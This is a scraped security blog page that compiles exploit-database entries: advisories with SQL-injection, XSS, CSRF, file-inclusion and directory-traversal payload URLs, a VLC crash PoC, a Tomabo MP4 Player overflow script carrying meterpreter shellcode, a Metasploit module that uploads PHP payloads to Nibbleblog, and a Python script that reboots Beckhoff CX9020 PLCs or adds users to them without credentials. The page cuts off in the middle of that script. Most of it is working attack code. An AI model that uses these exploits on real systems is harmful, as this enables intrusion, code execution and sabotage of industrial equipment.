source: https://www.securityfocus.com/bid/59322/info
Crafty Syntax Live Help is prone to a remote file-include vulnerability and a path-disclosure vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to obtain sensitive information and compromise the application and the underlying system; other attacks are also possible.
Crafty Syntax Live Help versions 2.x and versions 3.x are vulnerable.
File-include:
http://www.example.com/path/admin.php?page=[RFI]
Path-disclosure:
http://www.example.com/livehelp/xmlhttp.php
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863530222
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow
# Date: 18/10/2015
# Exploit Author: Andrea Sindoni
# Software Link: https://www.videolan.org/vlc/index.it.html
# Version: 2.2.1
# Tested on: Windows 7 Professional 64 bits
#
# PoC with MP3: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38485.zip
#
#APP: vlc.exe
#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre
#FOLLOWUP_NAME: MachineOwner
#MODULE_NAME: libvlccore
#IMAGE_NAME: libvlccore.dll
#FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd
#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62
#EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3)
# ExceptionCode: c00000fd (Stack overflow)
# ExceptionFlags: 00000000
#NumberParameters: 2
# Parameter[0]: 0000000000000001
# Parameter[1]: 0000000025ed2a20
#
#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001
#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
#
#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62)
#
import eyed3
value = u'B'*6500000
audiofile = eyed3.load("base.mp3")
audiofile.tag.artist = value
audiofile.tag.album = u'andrea'
audiofile.tag.album_artist = u'sindoni'
audiofile.tag.save()
# Title: Path Traversal Vulnerability
# Product: Belkin Router N150
# Author: Rahul Pratap Singh
# Website: https://0x62626262.wordpress.com
# Contact:
Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
Twitter: @0x62626262
# Vendor Homepage: http://www.belkin.com
# Firmware Tested: 1.00.08, 1.00.09
# CVE: 2014-2962
Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.
A patch was released by Belkin but that is still vulnerable.
POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/
Source: https://code.google.com/p/google-security-research/issues/detail?id=547
If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.
A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".
This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.
One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38490.zip
#!/usr/bin/python
#####################################################################
# Exploit Title: Tomabo MP4 Player 3.11.6 SEH Based Stack Overflow #
# Exploit Author: @yokoacc, @nudragn, @rungga_reksya #
# Vendor Homepage: http://www.tomabo.com/ #
# Software Link: http://www.tomabo.com/mp4-player/download.html #
# Vulnerable App: Attached #
# Version: 3.11.6 (possibility <= 3.11.6) #
# Tested on: Windows XP, 7, 8, and 8.1 #
# Special Thanks to: @OffsecTraining #
# Vendor Notification: August 30th, 2015 #
# Fixed Date: Around September 16th, 2015 (didn't response yet) #
# Public Disclosure: October 18th, 2015 #
#####################################################################
# How to: Run the code and open the m3u file with the Vulnerable MP4 Player by Tomabo
# Bad Character = '\x00\x09\x0a\x0b\x0c\x0d\x1a\x20'
# Payload= windows/meterpreter/bind_tcp ; PORT=4444
file ="whatever.m3u"
load = "\x41" * 1028
load += "\xeb\x08\x90\x90"
load += "\xA9\x1C\x40\x00"
load += "\x90" * 16
load += ("\xdb\xde\xbd\xbc\x9e\x98\xd8\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x48\x31\x6f\x18\x03\x6f\x18\x83\xef\x40\x7c\x6d\x24\x50\x03"
"\x8e\xd5\xa0\x64\x06\x30\x91\xa4\x7c\x30\x81\x14\xf6\x14\x2d"
"\xde\x5a\x8d\xa6\x92\x72\xa2\x0f\x18\xa5\x8d\x90\x31\x95\x8c"
"\x12\x48\xca\x6e\x2b\x83\x1f\x6e\x6c\xfe\xd2\x22\x25\x74\x40"
"\xd3\x42\xc0\x59\x58\x18\xc4\xd9\xbd\xe8\xe7\xc8\x13\x63\xbe"
"\xca\x92\xa0\xca\x42\x8d\xa5\xf7\x1d\x26\x1d\x83\x9f\xee\x6c"
"\x6c\x33\xcf\x41\x9f\x4d\x17\x65\x40\x38\x61\x96\xfd\x3b\xb6"
"\xe5\xd9\xce\x2d\x4d\xa9\x69\x8a\x6c\x7e\xef\x59\x62\xcb\x7b"
"\x05\x66\xca\xa8\x3d\x92\x47\x4f\x92\x13\x13\x74\x36\x78\xc7"
"\x15\x6f\x24\xa6\x2a\x6f\x87\x17\x8f\xfb\x25\x43\xa2\xa1\x21"
"\xa0\x8f\x59\xb1\xae\x98\x2a\x83\x71\x33\xa5\xaf\xfa\x9d\x32"
"\xd0\xd0\x5a\xac\x2f\xdb\x9a\xe4\xeb\x8f\xca\x9e\xda\xaf\x80"
"\x5e\xe3\x65\x3c\x57\x42\xd6\x23\x9a\x34\x86\xe3\x35\xdc\xcc"
"\xeb\x6a\xfc\xee\x21\x03\x94\x12\xca\x3d\x38\x9a\x2c\x57\xd0"
"\xca\xe7\xc0\x12\x29\x30\x76\x6d\x1b\x68\x10\x26\x4d\xaf\x1f"
"\xb7\x5b\x87\xb7\x33\x88\x13\xa9\x44\x85\x33\xbe\xd2\x53\xd2"
"\x8d\x43\x63\xff\x64\x83\xf1\x04\x2f\xd4\x6d\x07\x16\x12\x32"
"\xf8\x7d\x29\xfb\x6c\x3e\x45\x04\x61\xbe\x95\x52\xeb\xbe\xfd"
"\x02\x4f\xed\x18\x4d\x5a\x81\xb1\xd8\x65\xf0\x66\x4a\x0e\xfe"
"\x51\xbc\x91\x01\xb4\x3c\xed\xd7\xf0\x4a\x1f\xe4")
load += "\x44" * (1800 - len(load))
writeFile = open (file, "w")
writeFile.write(load)
writeFile.close()
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Nibbleblog File Upload Vulnerability',
'Description' => %q{
Nibbleblog contains a flaw that allows a authenticated remote
attacker to execute arbitrary PHP code. This module was
tested on version 4.0.3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'References' =>
[
['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
],
'DisclosureDate' => 'Sep 01 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Nibbleblog 4.0.3', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def check
cookie = do_login(username, password)
return Exploit::CheckCode::Detected unless cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'cookie' => cookie,
'vars_get' => {
'controller' => 'settings',
'action' => 'general'
}
)
if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def do_login(user, pass)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin.php')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
vprint_status("#{peer} - Logging in...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass
}
)
return session_cookie if res && res.code == 302 && res.headers['Location']
nil
end
def exploit
unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)
print_error("Target does not appear to be vulnerable.")
return
end
vprint_status("#{peer} - Authenticating using #{username}:#{password}")
cookie = do_login(username, password)
fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
vprint_good("#{peer} - Authenticated with Nibbleblog.")
vprint_status("#{peer} - Preparing payload...")
payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
data = Rex::MIME::Message.new
data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
data.add_part('My image', nil, nil, 'form-data; name="title"')
data.add_part('4', nil, nil, 'form-data; name="position"')
data.add_part('', nil, nil, 'form-data; name="caption"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
data.add_part('1', nil, nil, 'form-data; name="image_resize"')
data.add_part('230', nil, nil, 'form-data; name="image_width"')
data.add_part('200', nil, nil, 'form-data; name="image_height"')
data.add_part('auto', nil, nil, 'form-data; name="image_option"')
post_data = data.to_s
vprint_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin.php'),
'vars_get' => {
'controller' => 'plugins',
'action' => 'config',
'plugin' => 'my_image'
},
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') )
fail_with(Failure::Unknown, 'Unable to upload payload.')
end
vprint_good("#{peer} - Uploaded the payload.")
php_fname = 'image.php'
payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
vprint_status("#{peer} - Parsed response.")
register_files_for_cleanup(php_fname)
vprint_status("#{peer} - Executing the payload at #{payload_url}.")
send_request_cgi(
'uri' => payload_url,
'method' => 'GET'
)
end
end
source: https://www.securityfocus.com/bid/59371/info
The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:
1. A cross-site scripting vulnerability
2. A path-disclosure vulnerability
3. Multiple content-spoofing vulnerabilities
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Content spoofing:
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
Cross-site scripting:
http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
source: https://www.securityfocus.com/bid/59690/info
The Game Section plugin for MyBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Game Section 1.2.2 are vulnerable.
http://www.example.com/games.php?des=%27%22%3E%3E%3Cscript%3Ealert%28%27+by+Darksnipper%27%29%3C%2Fscript%3E
source: https://www.securityfocus.com/bid/60089/info
Weyal CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
http://www.example.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database()
source: https://www.securityfocus.com/bid/60010/info
thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks.
www.example.com/../../../../../../../../etc/passwd
www.example.com/../../../../../../../../etc/shadow
/*
source: https://www.securityfocus.com/bid/60004/info
The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input.
An attacker may exploit this issue to execute arbitrary code within the context of the affected application or to crash the application.
RRDtool 1.4.7 is affected; other versions may also be vulnerable.
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <string.h>
#define DFLTHOST "www.example.com"
#define DFLTPORT 5501
#define MAXMSG 256
#define fgfsclose close
void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port);
int fgfswrite(int sock, char *msg, ...);
const char *fgfsread(int sock, int wait);
void fgfsflush(int sock);
int fgfswrite(int sock, char *msg, ...)
{
va_list va;
ssize_t len;
char buf[MAXMSG];
va_start(va, msg);
vsnprintf(buf, MAXMSG - 2, msg, va);
va_end(va);
printf("SEND: \t<%s>\n", buf);
strcat(buf, "\015\012");
len = write(sock, buf, strlen(buf));
if (len < 0) {
perror("fgfswrite");
exit(EXIT_FAILURE);
}
return len;
}
const char *fgfsread(int sock, int timeout)
{
static char buf[MAXMSG];
char *p;
fd_set ready;
struct timeval tv;
ssize_t len;
FD_ZERO(&ready);
FD_SET(sock, &ready);
tv.tv_sec = timeout;
tv.tv_usec = 0;
if (!select(32, &ready, 0, 0, &tv))
return NULL;
len = read(sock, buf, MAXMSG - 1);
if (len < 0) {
perror("fgfsread");
exit(EXIT_FAILURE);
}
if (len == 0)
return NULL;
for (p = &buf[len - 1]; p >= buf; p--)
if (*p != '\015' && *p != '\012')
break;
*++p = '\0';
return strlen(buf) ? buf : NULL;
}
void fgfsflush(int sock)
{
const char *p;
while ((p = fgfsread(sock, 0)) != NULL) {
printf("IGNORE: \t<%s>\n", p);
}
}
int fgfsconnect(const char *hostname, const int port)
{
struct sockaddr_in serv_addr;
struct hostent *hostinfo;
int sock;
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("fgfsconnect/socket");
return -1;
}
hostinfo = gethostbyname(hostname);
if (hostinfo == NULL) {
fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname);
close(sock);
return -2;
}
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(port);
serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr;
if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
perror("fgfsconnect/connect");
close(sock);
return -3;
}
return sock;
}
int main(int argc, char **argv)
{
int sock;
unsigned port;
const char *hostname, *p;
int i;
hostname = argc > 1 ? argv[1] : DFLTHOST;
port = argc > 2 ? atoi(argv[2]) : DFLTPORT;
sock = fgfsconnect(hostname, port);
if (sock < 0)
return EXIT_FAILURE;
fgfswrite(sock, "data");
fgfswrite(sock, "set /sim/rendering/clouds3d-enable true");
fgfswrite(sock, "set /environment/clouds");
for (i=0; i < 5; i++) {
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i);
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i);
}
p = fgfsread(sock, 3);
if (p != NULL)
printf("READ: \t<%s>\n", p);
for (i=0; i < 5; i++) {
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i);
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i);
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i);
}
p = fgfsread(sock, 3);
if (p != NULL)
printf("READ: \t<%s>\n", p);
fgfswrite(sock, "quit");
fgfsclose(sock);
return EXIT_SUCCESS;
}
source: https://www.securityfocus.com/bid/59934/info
Jojo CMS is prone to an SQL-injection vulnerability because it fails to sanitize user-supplied input.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
POST /articles/test/ HTTP/1.1
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' --
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment
source: https://www.securityfocus.com/bid/59940/info
The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
WP cleanfix 2.4.4 is vulnerable; other versions may also be affected.
SRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpCleanFixAjax" />
<input type="hidden" name="command" value="echo phpversion();" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/59933/info
Jojo CMS is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/forgot-password/" method="post">
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
<input type="submit" id="btn">
</form>
source: https://www.securityfocus.com/bid/59932/info
The Mail On Update plugin for WordPress is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
Mail On Update 5.1.0 is vulnerable; prior versions may also be affected.
<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post"
class="buttom-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
example1 () example com
example2 () example com
example3 () example com
example4 () example com
example5 () example com
example6 () example com
example7 () example com
example8 () example com
example9 () example com
example10 () example com
henri+monkey () nerv fi" />
<input name="submit" type="submit" value="Save"/></form></html>
source: https://www.securityfocus.com/bid/59928/info
Open Flash Chart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://ww.example.com/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()
source: https://www.securityfocus.com/bid/59886/info
The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
#!/usr/bin/env python
'''
# Exploit Title: Beckhoff CX9020 CPU Module Web Exploit (RCE)
# Date: 2015-10-22
# Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be, based on work by Frank Lycops (frank.lycops@thesecurityfactory.be)
# Vendor Homepage: https://www.beckhoff.com/english.asp?embedded_pc/cx9020.htm
# Version: TwinCat UpnpWebsite < 3.1.4018.13, fixed with ftp://ftp.beckhoff.com/software/embPC-Control/CX90xx/CX9020/CE/TC3/CX9020_CB3011_WEC7_HPS_v602i_TC31_B4018.13.zip
# Tested on: Python runs on any Windows or Linux
# CVE : CVE-2015-4051 (similar to this CVE, but different service IPC Diagnostics Authentication <> Web Authentication)
Copyright 2015 Photubias(c)
Written for Howest(c) University College, Ghent University, XiaK
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name CX9020-WebControl.py
written by tijl[dot]deneut[at]howest[dot]be
This POC allows to reboot any CX9020 PLC and add random (Web) users to be configured.
-> Test by going to http://<IP>/config (redirects to http://<NAME>:5120/UpnpWebsite/index.htm)
-> Default credentials are guest/1 and webguest/1, but this exploit works without credentials
-> Verify Website version by logging into http://<IP>/config and clicking "TwinCAT"
'''
import sys, httplib, socket, re, base64
## Defining Functions first:
def rebootMachine(UNS, IP, IO):
## This is the SOAP Message:
SoapMessage = "<?xml version=\"1.0\" encoding=\"utf-8\"?><s:Envelope s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\">"
SoapMessage += "<s:Body><u:Write xmlns:u=\"urn:beckhoff.com:service:cxconfig:1\"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>"
SoapMessage += "<IndexOffset>-" + IO + "</IndexOffset>"
SoapMessage += "<pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>"
## Construct and send the HTTP POST header
rebootwebservice = httplib.HTTP(IP + ":5120")
rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
rebootwebservice.putheader("Host", IP + ":5120")
rebootwebservice.putheader("User-Agent", "Tijls Python Script")
rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
rebootwebservice.endheaders()
rebootwebservice.send(SoapMessage)
## Get the response
statuscode, statusmessage, header = rebootwebservice.getreply()
if statuscode == 200:
print "Exploit worked, device should be rebooting!"
return 1
else:
print "Something went wrong, the used index is probably wrong? This is the response code:"
## Printing HTTP Response code
res = rebootwebservice.getfile().read()
print res
return 0
#print "Response: ", statuscode, statusmessage
#print "headers: ", header
def addUser(UNS, IP, PDATA, IO):
## This is the SOAP Message:
SoapMessage = '<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
SoapMessage += '<s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>'
SoapMessage += '<IndexOffset>-' + IO + '</IndexOffset>'
SoapMessage += '<pData>' + PDATA + '</pData></u:Write></s:Body></s:Envelope>'
## Construct and send the HTTP POST header
rebootwebservice = httplib.HTTP(IP + ":5120")
rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
rebootwebservice.putheader("Host", IP + ":5120")
rebootwebservice.putheader("User-Agent", "Tijls Python Script")
rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
rebootwebservice.endheaders()
rebootwebservice.send(SoapMessage)
## Get the response
statuscode, statusmessage, header = rebootwebservice.getreply()
if statuscode == 200:
print "Exploit worked, user is added!"
return 1
else:
print "Something went wrong, the used index is probably wrong? This is the response code:"
## Printing HTTP Response code
res = rebootwebservice.getfile().read()
print res
return 0
#print "Response: ", statuscode, statusmessage
#print "headers: ", header
def addOwnUser(UNS, IP, IO):
## This will prompt for username and password and then create the custom pData string
USERNAME = raw_input("Please enter the username: ")
PASSWORD = raw_input("Please enter the password: ")
CONCATENATED = USERNAME + PASSWORD
# Creating the Full String to encode
FULLSTRING = chr(16+len(CONCATENATED))
FULLSTRING += chr(0)+chr(0)+chr(0)
FULLSTRING += chr(len(USERNAME))
FULLSTRING += chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)
FULLSTRING += chr(len(PASSWORD))
FULLSTRING += chr(0)+chr(0)+chr(0)
FULLSTRING += CONCATENATED
# Encode a first time, but we don't want any '=' signs in the encoded version
PDATA = base64.b64encode(FULLSTRING)
if PDATA.endswith('='):
FULLSTRING += chr(0)
PDATA = base64.b64encode(FULLSTRING)
if PDATA.endswith('='):
FULLSTRING += chr(0)
PDATA = base64.b64encode(FULLSTRING)
# Now we have the correct PDATA string
print 'We will use this string: '+PDATA
return addUser(UNS, IP, PDATA, IO)
def is_ipv4(ip):
match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
if not match:
return False
quad = []
for number in match.groups():
quad.append(int(number))
if quad[0] < 1:
return False
for number in quad:
if number > 255 or number < 0:
return False
return True
###### START PROGRAM #######
if not len(sys.argv) == 2:
IP = raw_input("Please enter the IPv4 address of the Beckhoff PLC: ")
else:
IP = sys.argv[1]
if not is_ipv4(IP):
print "Please go read RFC 791 and then use a legitimate IPv4 address."
sys.exit()
## Initialize variables
UNS = ''
ActiveRebootIndOff = '1329528576' # Active means active Engineering Licenses (when PLC has been programmed less than a week ago)
InactiveRebootIndOff = '1330577152'
ActiveUserIndOff = '1339031296'
InactiveUserIndOff = '1340079872'
print 'Finding the unique UNS (UUID) of the target system (' + IP + '), hold on...\n'
DISCOVERY_MSG = ('M-SEARCH * HTTP/1.1\r\n' +
'HOST: 239.255.255.250:1900\r\n' +
'MAN: "ssdp:discover"\r\n' +
'MX: 3\r\n' +
'ST: upnp:rootdevice\r\n' +
'\r\n')
SOCK = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
SOCK.settimeout(10)
SOCK.sendto(DISCOVERY_MSG, (IP, 1900))
try:
RESPONSE = SOCK.recv(1000).split('\r\n')
except:
print 'Something went wrong, is the system online?\nTry opening http://' + IP + ':5120/config\n'
raw_input('Press Enter to continue...')
sys.exit(0)
for LINE in RESPONSE:
if ':uuid' in LINE:
UNS = LINE[9:45]
print 'Got it: ' + LINE[9:45] + '\n'
SOCK.close()
if not UNS:
print '\n\nProblem finding UNS, this is full SSDP response: \n'
for LINE in RESPONSE: print LINE
input('Press Enter to continue...')
sys.exit(0)
else:
print 'Let\'s go, choose your option:'
print '1 = reboot PLC'
print '2 = add user tijl with password xiak'
print '3 = add user from your choosing'
usr_input = raw_input('Select a number: ')
if usr_input == '1':
if not rebootMachine(UNS, IP, InactiveRebootIndOff):
rebootMachine(UNS, IP, ActiveRebootIndOff)
raw_input('Press Enter to continue...')
elif usr_input == '2':
if not addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', InactiveUserIndOff):
addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', ActiveUserIndOff)
